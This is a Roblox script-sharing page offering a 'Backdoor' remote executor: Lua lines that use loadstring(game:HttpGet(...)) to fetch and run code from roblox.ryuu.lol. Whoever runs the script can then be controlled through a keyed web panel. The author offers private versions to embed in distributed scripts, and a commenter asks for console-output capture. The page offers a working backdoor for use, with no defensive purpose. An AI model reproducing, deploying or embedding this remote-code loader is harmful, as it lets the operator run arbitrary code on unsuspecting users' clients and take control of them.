ADVERTISEMENTREMOVE ADS

"Backdoor" Remote Executor | Execute Scripts On Others

Universal script
1 month ago
Script preview thumbnail
Script Preview

Description

This script allows you to execute scripts on people who execute this script

943578345 is the key, you can change it to whatever you want, if someone executes the script with that key, you can go on the webpage:
https://roblox.ryuu.lol/control/943578345
and execute scripts on whoever executed the script with that key.

SOME EXECUTORS DON'T ALLOW LOADSTRINGS, THE GETGENV LOADSTRING WORKED ON SOLARA FOR ME. IF IT DOESN'T WORK, OPEN THE LINK IN THE LOADSTRING FOR THE FULL CODE WITHOUT A LOADSTRING, THE LOADSTRING WITH getgenv().controlconfig WILL USE A RANDOM KEY IF ONLY USING THE CODE INSIDE, USE OTHER LOADSTRINGS CODE.

If you want to use this for production / add to your script, DM/Add ryuulol on discord, I can make a private one for you that is password protected.

Features:

  • backdoor
  • remote control
  • control
  • admin
  • website
  • web

Tested with

ADVERTISEMENTREMOVE ADS
22 Lines • 1.06 KiB
Raw
-- This script allows you to control whoever runs this script, from the site below.
-- There are two different ways to execute the script:
getgenv().controlconfig = {
["key"] = "943578345"
}
loadstring(game:HttpGet("https://roblox.ryuu.lol/control.lua"))()
-- Or
loadstring(game:HttpGet("https://roblox.ryuu.lol/control/943578345.lua"))()
-- 943578345 is the key, you can change it to whatever you want, if someone executes the script with that key, you can go on the webpage:
-- https://roblox.ryuu.lol/control/943578345
-- and execute scripts on whoever executed the script with that key.
-- SOME EXECUTORS DON'T ALLOW LOADSTRINGS, THE GETGENV LOADSTRING WORKED ON SOLARA FOR ME. IF IT DOESN'T WORK, OPEN THE LINK IN THE LOADSTRING FOR THE FULL CODE WITHOUT A LOADSTRING, THE LOADSTRING WITH getgenv().controlconfig WILL USE A RANDOM KEY IF ONLY USING THE CODE INSIDE, USE OTHER LOADSTRINGS CODE.
-- If you want to use this for production / add to your script, DM/Add ryuulol on discord, I can make a private one for you that is password protected.
ADVERTISEMENTREMOVE ADS

Comments

1 comment
to add a comment
iv

Love it, Cant wait to see it have more updates. Will be nice to have an option to see their console output, Great project!

0
0
ADVERTISEMENTREMOVE ADS